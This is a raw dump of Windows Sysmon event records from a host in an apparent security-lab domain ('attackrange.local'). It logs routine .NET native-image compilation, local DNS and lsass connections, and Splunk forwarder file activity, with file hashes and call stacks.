21:03:11.703{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A18F-60D3-2603-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:11.422{4DB9351A-A184-60D3-2503-00000000CF01}6136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LJFM4CRZNW\System.ServiceModel.ni.dll.auxMD5=BC5B8E9098BCB0FBD5B0BB3F67D6FA39,SHA256=EBC59D5A5922EAA498E84B02C3F7179FC2CBABDB24D64995DDC1D46FFB0939A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:11.422{4DB9351A-A184-60D3-2503-00000000CF01}6136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LJFM4CRZNW\System.ServiceModel.ni.dllMD5=17015EDD211E2B3F88EA4398394359C3,SHA256=9DB2318A0C2A57C66DA61C7D698A02480B64D635E332EEBD9CE461F7F65B4476,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000019976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.794{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57466- 354300x800000000000000019975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.794{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57466-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domain 354300x800000000000000019974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.789{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61410-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000019973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.789{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61410-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000019972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.788{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61409-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000019971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.788{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61409-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 11241100x800000000000000019970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:11.047{4DB9351A-A184-60D3-2503-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17f8-0\System.ServiceModel.dll2021-06-23 21:03:11.047 23542300x800000000000000019991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:12.954{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9450FD475E58CC1B294E1415255B73E5,SHA256=DB39E0C3C5C249A3E337C9F9C0AF9AAC8CFA3205FC7C8A9F91419018D1E935FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:12.391{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A190-60D3-2703-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:12.375{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A190-60D3-2703-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:12.375{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A190-60D3-2703-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000019987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:10.373{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local50420- 354300x800000000000000019986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:10.373{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local50420-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domain 354300x800000000000000019985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.795{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local65524- 354300x800000000000000019984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:09.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-663.attackrange.local65524-false10.0.1.14win-dc-663.attackrange.local53domain 23542300x800000000000000019983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:12.094{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3649BB154A1CE5FA7314DDE40796892B,SHA256=02CC8DF31F720C4493C99A02DC5D4BBAE92F73AFDD5301CC0CD2B985C62AA247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.969{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965E533EA0FC50F61AEC8C587F9B4B6A,SHA256=7080A33F73C48F4EFEF86B2E251270B09B9334E7D89205B516E9EA5137E02AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.391{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=440D7219ED3C23F4EB911F17150EF212,SHA256=BE61D73C2CBE7A19AEA900A306C93C9AFBA02AA23ED3A0C3E610805C7B9096B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.407{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local50785- 354300x800000000000000020021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.406{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57200- 354300x800000000000000020020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.405{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local52240- 354300x800000000000000020019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.405{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58495- 354300x800000000000000020018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.404{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local60288- 354300x800000000000000020017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.402{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49955- 354300x800000000000000020016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.401{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55452- 354300x800000000000000020015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.400{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53339- 354300x800000000000000020014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.399{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local59726- 354300x800000000000000020013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.398{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57767- 354300x800000000000000020012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.397{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local56203- 354300x800000000000000020011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.394{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54560- 354300x800000000000000020010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.392{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local56310- 354300x800000000000000020009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.390{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local54590- 354300x800000000000000020008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.389{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53416- 354300x800000000000000020007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.388{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local52659- 354300x800000000000000020006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.388{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local59384- 354300x800000000000000020005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.386{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53337- 354300x800000000000000020004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.385{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local56358- 354300x800000000000000020003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.383{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local52369- 354300x800000000000000020002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.382{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local59469- 354300x800000000000000020001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.381{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local49867- 354300x800000000000000020000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.381{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local52389- 354300x800000000000000019999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.379{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local50925- 354300x800000000000000019998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.379{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58818- 354300x800000000000000019997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.375{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local49963- 354300x800000000000000019996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.374{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49827- 354300x800000000000000019995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:13.373{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local65524- 23542300x800000000000000019994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:15.000{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120E8C8C7C06BA2BCFFD42BD7990D366,SHA256=7531DF7FD5EB56374F2E02507C832A60FFB024986A85ACC62A86DD728BD7C186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:16.329{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4DD59D3B813616A2E192A0CB9D3D8D5,SHA256=8A5EDDB98C120E9779F17A460BD587DE599E60F3F0FC2DF6BDACA0E1D899C6DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:14.179{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61411-false10.0.1.12-8000- 23542300x800000000000000020025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:17.360{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E934F89860735420B4229BD0D40BC6F3,SHA256=ECC723028A024A7CD0D4FA37CC26E47DEFDB3BE4BA2292C79C39AB739BA86A64,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:18.938{4DB9351A-A190-60D3-2703-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1418-0\PresentationCore.dll2021-06-23 21:03:18.938 23542300x800000000000000020026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:18.360{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21731DAA6016669F2DDB051073201033,SHA256=98DE5F89C4AFDE7B5F6C284B2FCF7B9A086248A16ED0DB337AAEF1B6B75FF72F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.563{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A197-60D3-2803-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.547{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A197-60D3-2803-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 